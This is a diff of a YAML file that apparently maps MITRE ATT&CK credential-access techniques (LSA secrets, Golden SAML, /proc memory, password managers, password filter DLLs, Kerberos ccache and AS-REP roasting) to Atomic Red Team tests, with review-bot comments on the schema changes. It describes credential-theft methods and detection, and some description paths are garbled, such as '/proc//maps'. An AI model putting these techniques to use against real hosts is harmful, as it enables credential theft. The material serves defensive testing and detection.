- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -89539,6 +90155,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -89546,16 +90165,47 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests:
- name: Dumping LSA Secrets
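Review bot: `x_mitre_permissions_required: [SYSTEM]` is removed in this hunk with no structured replacement, so the privilege requirement now survives only in the prose ("Adversaries with SYSTEM access to a host") and in the atomic test's `elevation_required: true`; anything downstream that filters techniques or derives elevation from the removed field needs another source now. Separately, the carried-over reference description `1Windows Credentials: Attack, Mitigation, Defense` still has the stray leading `1`; it is present in both the old and the new lines, so it is an upstream data typo best fixed at the source rather than patched here.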
@@ -89606,17 +90256,18 @@ credential-access:
elevation_required: true
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
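Review bot: the only substantive change in this hunk is `Azure AD` to `Entra ID` in the final description paragraph, which matches the platform rename elsewhere in the sync. The unchanged context lines around it, though, carry hard line breaks that separate `NotOnOrAfter`, `conditions ...`, `AccessTokenLifetime` and `LifetimeTokenPolicy` from their sentences inside a `|-` literal block, which looks like inline-code markup stripped by the converter; the same pattern appears in the T1003.004 and T1556.002 descriptions (`HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets` followed by a lone `.`, `Notification Packages` followed by a lone `)`). This hunk does not introduce it, but because the literal block preserves those breaks in the rendered text it is worth a converter fix.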
@@ -89629,14 +90280,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -89677,9 +90328,6 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests:
- name: Golden SAML
@@ -89725,7 +90373,7 @@ credential-access:
name: powershell
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
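Review bot: in the unchanged description context, `/proc//maps` and `/proc//mem` have an empty path segment where the per-process id belongs (the sentence itself says "For each process"), almost certainly because the converter stripped an angle-bracketed placeholder as an HTML tag. The hunk only updates `modified`, so the fix belongs in the converter, but the paths as written are wrong as documentation and should be corrected before this description is relied on.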
@@ -89788,7 +90436,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests:
- name: Dump individual process memory with sh (Local)
@@ -90004,76 +90651,75 @@ credential-access:
elevation_required: true
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
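Review bot: two points in the T1555.005 part of this hunk. First, `x_mitre_permissions_required: [User]` is removed with no structured replacement, the same pattern as T1003.004; this technique has `atomic_tests: []`, so nothing in the object documents the required privilege level any more. Second, the reference `source_name` `Cyberreason Anchor December 2019` is misspelled relative to the vendor in its URL (cybereason.com), but the description cites it verbatim as `(Citation: Cyberreason Anchor December 2019)`, so correcting the name in one place without the other would break the citation link. Apart from the 1.0 to 1.1 version bump, the 3.2.0 spec bump and the new `revoked` and `x_mitre_deprecated` flags, the rest of the hunk is a key reorder with identical values.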
@@ -90158,7 +90804,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Linux using tshark or tcpdump
@@ -90677,7 +91322,7 @@ credential-access:
elevation_required: true
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -90726,9 +91371,8 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests:
- name: Enumeration for Credentials in Registry
@@ -90758,31 +91402,7 @@ credential-access:
name: command_prompt
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
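Review bot: apart from the `modified` timestamp, everything removed in this hunk (platforms, domains, contributors, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-added in the next hunk in a different key order, so this is a reorder, not a content change. If the exporter now emits keys in a fixed order, note it in the PR description; otherwise sort keys deterministically before writing so future diffs only show real changes.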
@@ -90806,22 +91426,44 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
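Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed with no replacement while the rest of the block is re-emitted, and the same field disappears from T1558.004 below (`User`), so this looks like a schema change tied to the bump to `x_mitre_attack_spec_version: 3.2.0`. Confirm it is intentional and call it out in the PR description, since the atomic test's `elevation_required: true` is now the only privilege hint left in this technique entry.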
@@ -90917,58 +91559,89 @@ credential-access:
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
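Review bot: the new T1558.005 (Ccache Files) block is inserted ahead of T1558.004, so the whole T1558.004 technique shows as deleted here and re-added across the two hunks that follow; inserting new sub-techniques in key order (or sorting the map on export) would have made this a pure addition and kept the hunk reviewable. The new block ships with `x_mitre_detection: ''` and `atomic_tests: []`, so it adds a technique entry but no runnable test, which is fine for a data sync but worth one line in the PR description. The upstream citation key `Brining MimiKatz to Unix` is carried in verbatim, matching the key the parent T1558 block used; leave it unchanged so the `(Citation: ...)` lookups keep resolving.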
@@ -91003,6 +91676,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -91010,17 +91690,58 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
